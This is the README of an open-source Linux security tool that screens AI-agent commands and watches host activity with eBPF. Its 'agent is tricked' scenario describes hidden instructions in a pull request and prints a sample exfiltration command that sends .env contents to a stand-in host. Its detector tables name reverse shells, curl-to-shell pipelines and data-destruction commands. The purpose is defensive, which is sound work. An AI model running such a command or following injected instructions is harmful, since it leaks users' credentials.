Content
# Inner Warden
**Local safety layer for AI agents that can use the terminal.**
AI agents are starting to do real work: read files, run commands, install packages, call APIs, and touch servers. That is useful. It is also the moment a chatbot becomes something with operational power.
Inner Warden sits outside the agent, on the host it is using. It screens risky commands and MCP/tool traffic routed through its guard, watches the real Linux activity underneath with eBPF, blocks or flags dangerous behavior, and keeps the decision trail local. No cloud control plane. Open source. Dry-run by default.
> Your agent reads a pull request, a web page, or a file with hidden instructions.
> It tries to read secrets, run an unsafe shell command, or connect somewhere it should not.
> Inner Warden catches the action before the damage leaves the box, then shows you what happened and why.
```bash
curl -fsSL https://innerwarden.com/install | sudo bash
```
Installs in 10 seconds. Starts in observe-only mode. Dry-run by default. You decide when to go live.
[](https://scorecard.dev/viewer/?uri=github.com/InnerWarden/innerwarden)
[](https://www.bestpractices.dev/projects/12546)
[](https://codecov.io/gh/InnerWarden/innerwarden)
[](https://github.com/InnerWarden/innerwarden/actions/workflows/ci.yml)
[](https://github.com/InnerWarden/innerwarden/actions/workflows/security.yml)
[](LICENSE)







-green)



---
### Who is this for?
- **Developers and self-hosters** running AI agents that can edit code, call tools, or touch a shell
- **Founders and operators** who want to bring agents into real business workflows without "just trust the prompt" as the security plan
- **SREs and sysadmins** who manage Linux servers and want automated threat response, not just alerts
- **Security teams** who want kernel-level visibility (eBPF), MITRE ATT&CK coverage, local audit trails, and clear operator controls
### How is this different?
Prompt guardrails try to control what an agent says. Inner Warden controls what it actually does.
It lives where the action is: on the machine the agent can affect. Agent-facing checks can review commands and MCP tool calls before they run; host-level sensors still watch what actually executes. If the agent is tricked, the safety layer is not inside the thing being tricked. One binary, one SQLite database, no SIEM bundle, no external IDS, no cloud control plane. Two Rust daemons and a CLI.
45 eBPF kernel programs (loaded in prod; kernel-dependent). 82 detectors. 30 collectors. 69 cross-layer correlation rules. 90+ MITRE ATT&CK techniques covered across 12 ATT&CK tactics. 7900+ unit tests (665 named anchors that pin past bug fixes — see [ANCHOR_TESTS.md](ANCHOR_TESTS.md)) gate every change. 208 Sigma community rules. Autoencoder anomaly detection. Behavioral DNA attacker fingerprinting. JA3/JA4 TLS fingerprinting. YARA + Sigma rule engines. Monthly threat reports. Mesh collaborative defense. **Unified SQLite store** for every artifact (incidents, decisions, KV cache, graph snapshots, attacker profiles). **Explained alerts**: every notification carries a plain-language "what happened + why it matters" with the MITRE technique, so an alert teaches instead of showing a raw detector name. **Intelligent notifications**: incidents group into a single Telegram message per IP instead of one-per-event. **Circuit breaker**: per-hour cap on autonomous block decisions protects against runaway enforcement (pause / log-only / dry-run modes). **Continuous trust scoring**: graduated enforcement plus daily self-check. **Operator Trust IP**: mark an IP/CIDR monitor-only from the dashboard (still detected, logged, and notified — only the auto-block is suppressed; time-boxable; audited). **Truthful containment**: a threat the firewall is already dropping reads as *Contained* instead of nagging you for action it doesn't need, verified against the live firewall. **Regression safety net**: `make scenario-qa` gates every PR against drift for 7 canonical attack scenarios, and a CI smoke test runs the real `curl \| sudo bash` install path on every change so the front door never breaks.
<h3 align="center">
<a href="https://innerwarden.com/live">See it responding to real attacks right now</a>
</h3>
https://github.com/user-attachments/assets/3acf547d-9c5c-4f83-bcfa-22ba68e21741
---
### Why this exists
I built Inner Warden because agents are going to do real work, and real work needs supervision. The same system that can catch a reverse shell at the kernel level, block an attacker, deploy a honeypot, and alert you on Telegram can also sit underneath an AI agent and ask a simpler question: "is this action safe to let through?"
Apache-2.0. If this project helps make agent automation safer to try, [give it a star](https://github.com/InnerWarden/innerwarden/stargazers) so others can find it.
---
## Architecture
```
┌─────────────────────────────────────────────────────────────────────┐
│ FIRMWARE / BIOS (Ring -2) │
│ MSR write guard (LSTAR/SMRR) | ACPI method monitoring | ESP hash │
│ SPI controller probing | eBPF weaponization detection (VoidLink) │
└─────────────────────────────────────────────┬───────────────────────┘
│
┌─────────────────────────────────────────────┼───────────────────────┐
│ HYPERVISOR (Ring -1) │ │
│ VM introspection | KVM monitoring | VM exit analysis │
└─────────────────────────────────────────────┼───────────────────────┘
│
┌─────────────────────────────────────────────┼──────────────────────┐
│ KERNEL (Ring 0) │ │
│ │
│ ┌───────────── ─┐ ┌────────────┐ ┌─────────┐ ┌───────────────┐ │
│ │23 tracepoints │ │ 10 kprobes │ │ 5 LSM │ │ XDP │ │
│ │ execve, │ │ creds, │ │ exec │ │ wire-speed │ │
│ │ connect, │ │ MSR, ACPI │ │ file │ │ IP blocking │ │
│ │ openat, │ │ timestomp │ │ bpf │ │ 10M+ pps │ │
│ │ mount, clone, │ │ truncate │ │ + kill │ │ allowlist + │ │
│ │ ptrace, ... │ │ + 7 raw_tp │ │ chain │ │ blocklist │ │
│ └──────┬─────── ┘ └─────┬──────┘ └───┬─────┘ └──────┬────────┘ │
│ └─ ───────┬───────┘ │ │ │
│ ▼ │ │ │
│ ┌─────────────┐ │ │ │
│ │ Ring Buffer │ │ │ │
│ │ (1MB epoll) │ │ │ │
│ └──────┬──────┘ │ │ │
└──────────────────┼────────────── ──────┼───────────────┼───────────┘
│ │ │
▼ │ │
┌────────────────────────────────────────────────────────────────── ┐
│ SENSOR │
│ │
│ ┌─────────┐ ┌─────────┐ ┌────────┐ ┌────────────────────────┐ │
│ │auth.log │ │journald │ │ Docker │ │ eBPF collector │◄─┘ |
│ │nginx │ │syslog │ │ cgroup │ │ (47 compiled) │ |
│ └────┬────┘ └────┬────┘ └──┬──── ┘ └───────────┬────────────┘ │
│ │ │ │ │ │
│ ┌────┴────┐ ┌────┴─────┐ ┌─┴──────────────┐ │ │
│ │DNS/HTTP │ │TLS/JA3 │ │kernel_integrity│ │ │
│ │capture │ │JA4 │ │proc_maps │ │ │
│ │(native) │ │(native) │ │fanotify │ │ │
│ └────┬────┘ └────┬─────┘ └───────┬────────┘ │ │
│ └───────────┴───────────────┴─────────────┘ │
│ │ │
│ ┌─────▼──────┐ │
│ │82 detectors│ + 8 YARA + 208 Sigma (+9 built-in)│
│ │ stateful │ │
│ └─────┬──────┘ │
│ │ │
│ ┌───────────▼───────────┐ │
│ │ events + incidents │ │
│ │ (SQLite WAL) │ │
│ └───────────┬───────────┘ │
└──────────────────────────┼────────────────────────────────────────┘
│
┌──────────────────────────┼────────────────────────────────────────┐
│ AGENT │ │
│ ▼ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Knowledge Graph (in-memory) │ │
│ │ 11 node types (Process, IP, File, User, Domain, ...) │ │
│ │ 53 relation types | 28 graph detectors | 10 graph rules │ │
│ │ Autoencoder anomaly scoring (65 features) │ │
│ └────────────────────────┬──────────────────────────────────┘ │
│ ▼ │
│ ┌──────────────────────────────────────────────┐ │
│ │ 69 Cross-Layer Correlation Rules │ │
│ │ + Kill Chain Tracker (7 stages per entity) │ │
│ │ + Threat DNA behavioral fingerprinting │ │
│ └────────────────────┬─────────────────────────┘ │
│ ▼ │
│ ┌──────────────────┐ │
│ │ Algorithm Gate │ skip low-sev, private IP │
│ └────────┬─────────┘ │
│ ▼ │
│ ┌────────────────────┐ │
│ │ Enrich: AbuseIPDB, │ │
│ │ GeoIP, CrowdSec │ │
│ └────────┬───────────┘ │
│ ▼ │
│ ┌──────────────────────┐ │
│ │ Local Warden │ on-device ONNX classifier │
│ │ (opt-in via │ ~91 MB, 61 ms p50; routes │
│ │ install-warden, │ Decide on-device when │
│ │ warden default) │ installed by default now │
│ └──────────┬───────────┘ │
│ ▼ │
│ ┌─────────────────────┐ │
│ │ AI Triage (opt LLM) │ OpenAI / Anthropic / Ollama │
│ └────────┬────────────┘ via AI Capability Router │
│ ▼ │
│ ┌─────────────────┐ ┌──────────────┐ │
│ │ Skill Executor │────►│ LSM enforce │ │
│ │ block_ip (6) │ │ XDP block │ │
│ │ kill_process │ └──────────────┘ │
│ │ suspend_sudo │ ┌──────────────┐ │
│ │ honeypot │────►│ Cloudflare │ │
│ │ playbooks (3) │ │ AbuseIPDB │ │
│ └────────┬────────┘ └──────────────┘ │
│ │ │
│ ┌────────────┼────────────┬──────────────┐ │
│ ▼ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │
│ │ Telegram │ │ Slack │ │ Webhook │ │ Mesh Network │ │
│ │ bot │ │ │ │ (any) │ │ peer defense │ │
│ └──────────┘ └──────────┘ └──────────┘ └──────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ innerwarden.db (SQLite WAL) │ │
│ │ Events, incidents, decisions, graph snapshots, KV state, │ │
│ │ attacker profiles, baselines | Hash chain audit trail │ │
│ └───────────────────────────────────────────────────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Dashboard: HUD, threats, investigation, attacker intel, │ │
│ │ MITRE ATT&CK map, monthly reports, baseline learning, │ │
│ │ ISO 27001 compliance, hash chain, live SSE, audit trail, │ │
│ │ drift metrics, trust scores, regression scenario gates │ │
│ └───────────────────────────────────────────────────────────┘ │
└───────────────────────────────────────────────────────────────────┘
```
**Runtime layers between the AI Triage and the notification channels above:**
- **Notification gate** — every channel (Telegram, Slack, Webhook, Push) goes through a single policy that returns `SendNow` / `DailyBriefingOnly` / `Drop`. Burst summary collapses 50+/h auto-blocks into one "all handled" message.
- **Graduated enforcement** — state machine promotes a responder from `Observe` → `Warn` → `Contain` → `Enforce` based on continuous trust scoring and AI SOC daily checks (11 system parsers).
- **Observation verification** — behavioural score engine + AI batch verification clears active false positives instead of leaving them to rot.
- **Regression safety net** — `make scenario-qa` asserts volume envelopes for 7 canonical scenarios; 10 drift metrics exported on `/metrics`.
- **Structured subgraph prompt** (opt-in) — when `ai.use_structured_subgraph = true`, the LLM receives the graph context as JSON nodes/edges instead of prose (measured +20pp action accuracy on qwen2.5:3b).
---
## What it does
1. **Guards agent actions**: agents and tool runners can call the local command-check API before acting, or route MCP tool calls through the inspecting proxy. Commands are scored against embedded Agent Threat Rules (ATR), risky actions can be denied or sent for review, and the host layer still verifies what actually ran.
2. **Watches**: 30 collectors across all layers — eBPF syscall tracing (45 kernel programs including timestomp and log truncation), firmware integrity (ESP, UEFI, ACPI, MSR, SPI), memory forensics (/proc/maps RWX detection), native network capture (DNS queries, HTTP requests, JA3/JA4 TLS fingerprinting), filesystem real-time monitoring, cgroup resource abuse, kernel integrity (syscall table + eBPF inventory), plus auth.log, journald, Docker, nginx, CloudTrail
3. **Detects**: 82 stateful detectors + 8 YARA malware rules + 9 built-in Sigma rules + 208 community Sigma rules identify brute-force, credential stuffing, port scans, C2 callbacks (including tunnels via ngrok/cloudflared/bore, non-standard ports, and DNS/ICMP/SSH-forward protocol tunneling), privilege escalation (non-baseline SUID exec, dangerous-capability abuse), container escapes, reverse shells (eBPF syscall sequence — impossible to evade), ransomware (entropy analysis), rootkits, DNS tunneling, data exfiltration (sensitive file read → outbound connect by PID, plus scp/rsync staged-egress), timestomping, log tampering, discovery bursts (nmap, wordlist scanners, argv-driven anomaly), collection patterns (clipboard, screen capture, password-protected archives), persistence (PAM module tampering, RC scripts, systemd units, cron, SSH keys), defense evasion (auditd disable, SELinux/AppArmor disable), data destruction (rm -rf user data, disk wipe, mkfs/luksFormat on running volumes), symlink/hardlink hijack of sensitive files, service-account interactive shells (foothold signal), privilege-provenance escalation (a root process whose exe/parent/namespace provenance does not justify it — setns into a non-root-owned user namespace, uid-0 exec from a writable path), and more. **90+ MITRE ATT&CK techniques covered** across 12 ATT&CK tactics.
4. **Correlates**: 69 cross-layer rules connect Firmware × Kernel × Userspace × Network × Honeypot events. Baseline anomalies, neural scores, and DDoS shield state all feed the correlation engine. Detects multi-stage attacks no single detector can see: firmware tampering → rootkit install, recon → brute force → data exfil, honeypot engagement → real attack on same IP, Discovery → Privesc → Lateral Movement chains, full kill chain Initial Access → Foothold → Persistence → Defense Evasion → Impact. The kill chain tracker tracks 7 attack stages per entity (IP, user, container).
5. **Learns**: baseline anomaly detection trains for 7 days then alerts on deviations — event rate drops (silence = compromise), new process lineages (nginx→sh), unusual login times, unknown network destinations. No rules needed.
6. **Blocks at the kernel**: LSM enforcement stops reverse shells and /tmp execution before they run. XDP drops attack traffic at wire speed. 8 kill chain patterns detected and blocked without signatures. Blocks propagate to mesh peers.
7. **Responds automatically**: the AI decision path drives response skills directly (block IP via ufw/iptables/nftables/firewalld/XDP, suspend sudo, kill process, pause container, honeypot redirect, capture forensics + pcap, notify, escalate). On top of that, 3 built-in SOC playbook templates ship (data exfil, Log4Shell, credential stuffing) that you extend with your own YAML and turn on with `[playbooks] enabled` (opt-in, off by default)
8. **Fingerprints attackers**: behavioral DNA (SHA-256 of detectors + tools + targets + timing patterns), **cross-IP tracking** (same attacker detected across VPN/Tor rotations via fuzzy DNA matching — risk score and detector knowledge inherited automatically), campaign detection via IOC clustering, recurrence tracking, risk scoring 0-100, monthly threat reports with MITRE heatmap
Everything is local, audited, and reversible.
---
## What happens when an agent is tricked
```
00:00 Your AI agent reads a pull request with hidden instructions
00:01 The agent tries to run: curl https://example.bad/leak?token=$(cat .env)
Agent guard evaluates: "secret read + outbound exfil"
ATR match: credential_exfiltration
Recommendation: deny
00:01 Tool call / command is blocked or held for review
00:01 eBPF/audit trail records what actually happened on the host
00:01 Telegram alert lands on your phone
The agent keeps working. The dangerous action does not.
```
The same host-defense layer still protects the server itself. If someone brute-forces SSH at 2 AM, Inner Warden can detect the attack, block the IP, capture the session, deploy a honeypot, and send you a report before you wake up.
No human needed when auto-execution is enabled. Otherwise, you approve via Telegram or the dashboard. Full audit trail. Every action reversible.
---
## Response skills
When a threat is confirmed, Inner Warden picks the right tool.
| Skill | What it does |
|-------|-------------|
| **Block IP (XDP)** | Wire-speed drop at the network driver, 10M+ packets/sec, zero CPU overhead |
| **Block IP (firewall)** | Deny via ufw, iptables, nftables, firewalld (RHEL/Rocky/Fedora), or pf (macOS). Persists across reboots. |
| **SOC playbook** | Run an operator-authored response sequence (declarative steps, virtual skills) with precedence before the auto-handle gate. Shadow mode validates on-host without acting; `innerwarden playbook test` simulates. Log4Shell playbook ships built-in. |
| **Suspend sudo** | Revokes sudo for a user via sudoers drop-in. Auto-expires after TTL. |
| **Kill process** | Terminates all processes for a compromised user. TTL-bounded. |
| **Block container** | Pauses a Docker container. Auto-unpauses after TTL. |
| **Deploy honeypot** | SSH/HTTP decoy with tiered authentication (rejects single-shot scanners, accepts Mirai-class bots on known-weak credentials, adaptive accept on 3+ unique guesses to catch human-direct attackers) and LLM-powered interactive shell. OpenSSH banner masquerade so scanners don't fingerprint it. Captures credentials, commands, and IOCs. |
| **Rate limit nginx** | Blocks abusive HTTP traffic at the nginx layer with TTL |
| **Monitor IP** | Bounded tcpdump capture for forensic analysis |
| **Block IP (Cloudflare)** | Edge-level blocking via Cloudflare API, stops traffic before it reaches your server |
| **Report to AbuseIPDB** | Shares attacker IPs with community threat intelligence |
| **Kill chain response** | Kills process tree + blocks C2 IP via XDP + captures forensics (ss, /proc) |
Blocking is **layered**: a single block decision triggers XDP (instant kernel drop) + firewall (persists reboot) + mesh broadcast (peer nodes block too) + Cloudflare edge (stops traffic upstream) + AbuseIPDB report (community intelligence). Kill chain incidents trigger the `kill-chain-response` skill: kill process tree + block C2 via XDP + capture forensics. All skills are bounded, audited, and reversible.
### Posture-aware alerting (v0.13.1)
Inner Warden snapshots your host's defensive posture every 10 minutes (sshd config, sudoers, services, firewall) and downgrades incident severity for attack vectors the host already neutralised. An `ssh_bruteforce` against a host with `PasswordAuthentication=no` becomes Low instead of High; the operator stops getting paged for things the kernel was always going to refuse anyway. Hard invariant: never demote when the attacker actually established a session, executed a process, or wrote a file. Read the live posture via `innerwarden get posture` or the dashboard panel; ask Telegram with `/posture`.
### Honeypot that actually traps (v0.13.1)
With `[honeypot] interaction = "llm_shell"` (the default is a low-interaction `banner`), the honeypot runs a tiered SSH listener that:
- Rejects the first 2 password attempts unconditionally so single-shot credential scanners disconnect with cred-only intel.
- Then accepts ONLY when `(user, password)` matches a curated list of Mirai canonical defaults + classic root defaults + appliance defaults. This is what makes a real dropper bot open the shell and run its payload.
- After 3 distinct guesses on a single connection, accepts adaptively to catch human-direct attackers typing org-specific passwords.
- Masquerades as `SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6` so scanners don't fingerprint the listener.
- Drops the trapped payload commands + IOCs into the dashboard's Honeypot tab, paginated and engaged-only by default.
### Decision review & human escalation (v0.15.0)
The real Autonomy Gap: an incident the Local Warden is not confident about, that no deterministic gate resolves, used to leak silently to an orphan-recovery sweep that auto-dismissed it ~1h later. v0.15.0 replaces that leak with an explicit, honest loop — trivial noise is suppressed without asking; anything weighty routes to **`needs_review`**, notifies the operator (Telegram with inline **Block / Ignore / Dismiss** buttons), and on timeout auto-resolves Low/Medium with an honest note while High/Critical re-notify and **never** silently auto-dismiss. Every human decision feeds a warden retrain label channel; mesh peers corroborate suppression. Every path has a deterministic fallback — the LLM is an enhancement, never a dependency. An already-blocked IP no longer churns the decide/re-block loop (spec 066). Read `innerwarden get decisions`; configure under `[observation]` / `[responder]`.
---
## What it detects
82 stateful detectors + 8 YARA rules + 9 built-in Sigma rules + 208 community Sigma rules covering the full attack lifecycle. **90+ unique MITRE ATT&CK techniques across 12 ATT&CK tactics.** Highlights:
| Detector | Threat | MITRE |
|----------|--------|-------|
| `ssh_bruteforce` | Repeated SSH failures from one IP | T1110.001 |
| `credential_stuffing` | Many usernames tried from one IP | T1110.004 |
| `distributed_ssh` | Coordinated botnet scan: many IPs, few attempts each | T1110 |
| `suspicious_login` | Brute-force followed by successful login = compromise | T1110 |
| `port_scan` | Rapid unique-port probing | T1595 |
| `reverse_shell` | Reverse/bind shell detection via eBPF + behavioral analysis | T1059 |
| `execution_guard` | Suspicious shell commands via AST analysis | T1059 |
| `process_tree` | Suspicious parent-child: web server → shell, Java RCE | T1059 |
| `privesc` | Real-time privilege escalation via eBPF kprobe on `commit_creds` | T1068 |
| `suid_page_cache_integrity` | SUID-root binary page-cache SHA divergence (Copy Fail / Dirty Frag / Fragnesia class) | T1014 / T1068 |
| `rootkit` | Kernel module and userland rootkit detection | T1014 |
| `ransomware` | Rapid file encryption, ransom note creation, extension changes | T1486 |
| `c2_callback` | Beaconing, C2 port connections, data exfiltration patterns | T1071 |
| `dns_tunneling` | Encoded DNS queries for covert data transfer | T1071.004 |
| `container_escape` | nsenter, Docker socket access, host file reads from container | T1611 |
| `lateral_movement` | SSH pivoting, credential reuse across hosts | T1021 |
| `crypto_miner` | CPU abuse from mining processes | T1496 |
| `web_scan` | HTTP error floods, path traversal, LFI probing | T1190 |
| `web_shell` | Web shell upload and command execution | T1505.003 |
| `data_exfiltration` | Large outbound transfers, DNS exfil, staging patterns | T1048 |
| `fileless` | In-memory execution, /proc/self/mem writes | T1055 |
| `log_tampering` | Log deletion, truncation, timestomping | T1070 |
| `kernel_module_load` | Unauthorized kernel module insertion | T1547.006 |
| `sudo_abuse` | Burst of privileged commands by a user | T1548 |
| `integrity_alert` | Changes to /etc/passwd, /etc/shadow, sudoers, SSH keys | T1098 |
| `packet_flood` | DDoS / volumetric attack detection | - |
| `user_agent_scanner` | Known scanner signatures (Nikto, sqlmap, Nuclei, 20+) | T1595.002 |
| `nmap_scan` / `wordlist_scan` / `discovery_anomaly` | Network/dir/host enumeration with context-aware silencing of operator activity | T1046 / T1595.001 / T1595.003 / T1018 |
| `clipboard_read` / `screen_capture` / `archive_pwd_protected` / `automated_file_collection` | Collection-stage attacker tools (xclip/xsel, scrot/maim, zip -P, mass tar/find) | T1115 / T1113 / T1560.001 / T1119 |
| `c2_web_tunnel` / `c2_protocol_tunneling` / `c2_non_standard_port` | ngrok/cloudflared/bore tunnels, DNS/ICMP/SSH-forward tunneling, listeners outside well-known ports | T1090.003 / T1572 / T1071.004 / T1571 |
| `setuid_exploit_pattern` / `capabilities_abuse` | Non-baseline SUID exec by non-root, dangerous Linux-capability + exploitation argv pairing | T1548.001 / T1068 / T1548.005 |
| `lateral_egress_ssh` / `lateral_egress_scp_rsync` | Outbound `ssh` from non-operator-shell tree, scp/rsync staging user-data dirs to remote | T1021.004 / T1029 / T1048.001 |
| `pam_module_change` / `startup_script_persistence` | PAM config/module tampering, RC script persistence (/etc/rc.local, /etc/init.d/, /etc/cron.d/) | T1556.003 / T1037.004 |
| `auditd_disable` / `selinux_apparmor_disable` | Stopping audit subsystem, disabling SELinux/AppArmor MAC | T1562.001 |
| `data_destruction_pattern` | rm -rf user data, disk wipe via dd, shred burst, mkfs on running volume, cryptsetup luksFormat | T1485 / T1561.001 / T1486 |
| **`symlink_hijack`** | Symlink/hardlink naming /etc/shadow, /etc/sudoers, /etc/pam.d/*, ~/.ssh/authorized_keys | T1555 / T1574.005 |
| **`system_user_interactive`** | Service accounts (www-data, nobody, postgres, …) running interactive shells with tty or sshd parent | T1059 / T1078.003 |
Plus: `docker_anomaly`, `search_abuse`, `credential_harvest`, `ssh_key_injection`, `user_creation`, `crontab_persistence`, `systemd_persistence`, `process_injection`, `outbound_anomaly`, `data_exfil_ebpf` (sensitive file read → outbound connect by PID), `keylogger_bash_trap` (shell startup file tampering + trap-DEBUG patterns), `yara_scan` (8 built-in rules: XMRig, webshells, Cobalt Strike, Metasploit, rootkits), `sigma_rule` (8 built-in rules: cron modification, /tmp execution, shadow access, docker.sock; plus 208 community rules auto-loaded from `rules/sigma/`), `cgroup_abuse` (CPU/memory resource abuse), `io_uring_anomaly`, `container_drift`, `host_drift`, `sensitive_write`.
`execution_guard` parses commands structurally using tree-sitter-bash. It catches `curl | sh` pipelines, `/tmp` execution, reverse shell patterns, and staged download-chmod-execute sequences.
`c2_callback` uses coefficient-of-variation analysis to detect beaconing: regular-interval connections to the same IP that indicate a compromised process phoning home.
`privesc` hooks the kernel's `commit_creds` function via kprobe. When a non-root process gains root through an unexpected path (not sudo/su/login), a Critical incident fires instantly, before any log is written.
---
## How it works
**Sensor**: deterministic signal collection. No AI, no HTTP. 30 collectors (auth.log, journald, Docker events, file integrity, firmware integrity, nginx access/error, shell audit, macOS unified log, syslog firewall, eBPF syscall tracing with 45 kernel programs loaded, JA3/JA4 TLS fingerprinting, memory forensics via /proc/maps, real-time filesystem monitoring with entropy analysis, kernel integrity monitoring, cgroup resource abuse detection, SUID inventory, systemd unit inventory, sysctl drift, kernel audit state monitoring (alerts when the audit subsystem is disabled, T1562.001), USB attach/detach, AWS CloudTrail). Events flow through a unified SQLite database (WAL mode) or Redis Streams to the agent. Syslog CEF output for SIEM integration. **7900+ unit tests** with **665 named anchors** (see [ANCHOR_TESTS.md](ANCHOR_TESTS.md)) gate every change before it can merge.
**eBPF**: 47 kernel programs compiled, 45 loaded in prod (kernel-dependent). Linux 5.8+, CO-RE/BTF portable:
- **23 tracepoints**: execve, connect, openat, ptrace, setuid, bind, mount, memfd_create, init_module, dup2/dup3, listen, mprotect, clone, unlinkat, renameat2, kill, prctl, accept4, sched_process_exit, ioperm, iopl, io_uring_submit, io_uring_create
- **10 kprobes**: `commit_creds` (privilege escalation), `native_write_msr` (firmware MSR tampering), `acpi_evaluate_object` (ACPI rootkit detection), `do_truncate` (log tampering), plus 6 timing-based rootkit kprobes (Trace of the Times: iterate_dir, filldir64, tcp4_seq_show, proc_pid_readdir kprobe/kretprobe pairs)
- **5 LSM kernel-block hooks** (Spec 052/053 + PR-A/B/C/D): `bprm_check_security` (exec blocking via PID→BLOCKED_PIDS map populated by kill chain detector), `userns_create` (container escape — blocks `unshare(CLONE_NEWUSER)` from chain-flagged PIDs), `ptrace_access_check` (process injection — blocks PTRACE_ATTACH/POKETEXT), `bpf_prog` (VoidLink defence — blocks malicious BPF program loads), `mmap_file` (real-time RWX block, replacing 5s `proc_maps` polling). Plus 2 legacy hooks (`file_open`, `bpf`) kept in parallel. All FP-free by design: legitimate users (Chrome sandbox, gdb, JIT compilers, systemd) pass through because they're never in BLOCKED_PIDS.
- **Execution Gate primitive (opt-in, inert by default)**: a dedicated `bprm_check_security` LSM program (`innerwarden_lsm_exec_gate`) that can enforce a binary allowlist by path-hash — denying any executable whose path is not on the allowlist with `-EPERM`. It ships **inert** (`LSM_POLICY` key 3 = 0): visible and auditable in the sensor source, but enforcing nothing. The `EXEC_ALLOWLIST` map stays empty until populated by operator tooling, and enforcement turns on only when explicitly configured — so it changes nothing for a default install.
- **XDP program**: wire-speed IP blocking at the network driver (10M+ pps drop rate)
- **Phase 2 firmware hooks**: MSR write guard (LSTAR/SMRR), I/O port access (SPI controller probing), ACPI method execution monitoring
> **Looking for the eBPF source code?** All 47 kernel programs live in a single file: [`crates/sensor-ebpf/src/main.rs`](crates/sensor-ebpf/src/main.rs).
**Kernel-level noise filters** keep overhead near zero: COMM_ALLOWLIST (137 trusted processes like sshd, systemd, docker), CGROUP_ALLOWLIST, PID_RATE_LIMIT, and PID_CHAIN. Tail call dispatcher routes events through a single attach point to N handlers via ProgramArray. Ring buffer with epoll wakeup delivers events in microseconds.
**DDoS defense**: 4-layer adaptive protection. XDP kernel drop (wire speed) + Shield module (dynamic rate limiting) + Cloudflare auto-failover (edge blocking) + Nginx rate limit. Rate limits tighten dynamically under attack.
**Mesh network**: collaborative defence between nodes. Attack one server, and all others block the IP automatically. Ed25519 signed signals, game-theory trust model (tit-for-tat), staging pool with TTL-based auto-reversal. No signal causes immediate action. Everything is scored and staged.
```bash
innerwarden config mesh enable
innerwarden config mesh add-peer https://peer-server:8790
```
Container-aware via cgroup ID. Zero performance overhead.
**Agent**: reads incidents from SQLite or Redis Streams. Fast loop (2s): algorithm gate → already-blocked / needs-review routing → enrichment (AbuseIPDB, GeoIP, CrowdSec, DShield, threat feeds) → VirusTotal hash check on YARA matches → SOC playbooks → AI triage → skill execution → pcap capture on High/Critical → audit trail. Slow loop (30s): cross-layer correlation (69 rules) → baseline learning → attacker intelligence consolidation (DNA + campaigns) → decision-review timeout sweep → monthly report generation → narrative summary. Auto-restart is handled by the OSS `innerwarden-supervisor` (rate-limited, `/metrics` health probe, Telegram alerts).
Two Rust daemons. No external dependencies. ~250 MB RAM with all features active (sensor + agent + satellite modules, single SQLite database). Dashboard with 9 views: Sensors HUD, Threats investigation, Report, Health, Honeypot, Compliance (ISO 27001), Intelligence (Profiles, Campaigns, Chains, Baseline), Monthly Report. Live SSE feed, MITRE ATT&CK mapping, 20 integration cards. Sleeps after 15 min of inactivity.
---
## AI is optional and controlled
Inner Warden detects and logs threats without any AI provider. Add AI when you want:
- **Confidence-scored recommendations**: not binary yes/no, but 0.0-1.0 scored decisions
- **Policy-gated execution**: AI recommends, your policy decides if it runs
- **Full transparency**: every AI decision is recorded in an append-only audit trail with reasoning
- **Twelve providers**: OpenAI, Anthropic, Ollama (local), OpenRouter, Groq, Together, Mistral, DeepSeek, Fireworks, Cerebras, Google Gemini, xAI Grok
AI is advisory unless you explicitly enable auto-execution. You set the confidence threshold.
---
## Operator in the loop
Not everything should be automatic.
- **Telegram**: every High/Critical incident pushed to your phone. Approve or deny with inline buttons. Sensitivity control: quiet/normal/verbose.
- **Slack**: incident notifications via incoming webhook
- **Webhook**: HTTP POST to any endpoint. Works with PagerDuty, Opsgenie, Discord, Microsoft Teams, Google Chat, DingTalk, Feishu/Lark, WeCom, n8n, Zapier, Make, Home Assistant.
- **Dashboard**: local authenticated UI with sensor HUD, investigation timeline, entity search, operator actions, live SSE feed, attack map, MITRE ATT&CK mapping, attacker path viewer, 20 integration cards, ISO 27001 compliance tab with hash chain verification
---
## Safe defaults
Inner Warden ships with the safest possible posture. On first run, **nothing is blocked, killed, or modified**. The system only observes and logs.
| Default | Meaning |
|---------|---------|
| `responder.enabled = false` | No actions taken. Observe only. |
| `dry_run = true` | Logs what it *would* do, without doing it. |
| `execution_guard` in observe mode | Detects suspicious commands, does not block. |
| Shell audit opt-in | Requires explicit privacy consent. |
| AI optional | Detection and logging work without any provider. |
| Append-only audit trail | Every decision stored in SQLite with full reasoning. |
You must explicitly change **two settings** before any response action can fire: enable the responder and disable dry-run. Neither happens automatically.
## Start in observe mode. Always.
Before enabling automatic responses, run Inner Warden in observe-only mode for a period that makes sense for your environment (days to weeks). During this time:
1. **Review the logs**: check the dashboard or query `innerwarden.db` in your data directory to understand what the detectors are flagging.
2. **Check for false positives**: make sure legitimate traffic (CI/CD systems, monitoring probes, your own scripts) is not being misidentified.
3. **Configure your allowlist**: add trusted IPs and users so they are never acted upon:
```bash
innerwarden trust add --ip 10.0.0.0/8
innerwarden trust add --user deploy
```
4. **Enable dry-run first**: when you enable the responder, keep `dry_run = true` so you can see what *would* happen without any actual effect:
```bash
innerwarden config responder --enable
```
5. **Go live only when you trust what you see**:
```bash
innerwarden config responder --enable --dry-run false
```
There is no rush. The system is designed to be useful in observe-only mode indefinitely.
---
## Modules
Enable what you need.
| Module | Threat | Response |
|--------|--------|----------|
| `ssh-protection` | SSH brute-force + credential stuffing | Block IP |
| `network-defense` | Port scanning | Block IP |
| `sudo-protection` | Sudo privilege abuse | Suspend user sudo |
| `execution-guard` | Malicious shell commands (AST) | Kill process / observe |
| `search-protection` | HTTP endpoint abuse | Rate limit nginx |
| `file-integrity` | Unauthorized file changes | Alert |
| `container-security` | Docker lifecycle anomalies | Block container / observe |
| `threat-capture` | Active threat investigation | Honeypot + traffic capture |
| `nginx-error-monitor` | HTTP error floods, path traversal | Block IP |
| `slack-notify` | Incident notifications | Slack webhook |
| `cloudflare-integration` | L7 DDoS / botnet IPs | Block at Cloudflare edge |
| `abuseipdb-enrichment` | IP reputation context | Enriched AI prompt |
| `dshield-enrichment` | SANS ISC IP reputation (keyless, read-only) | Enriched AI prompt |
| `geoip-enrichment` | Country/ISP geolocation | Enriched AI prompt |
| `fail2ban-integration` | Sync active fail2ban bans | Block enforcement |
| `crowdsec-integration` | CrowdSec community intel | Block enforcement (experimental) |
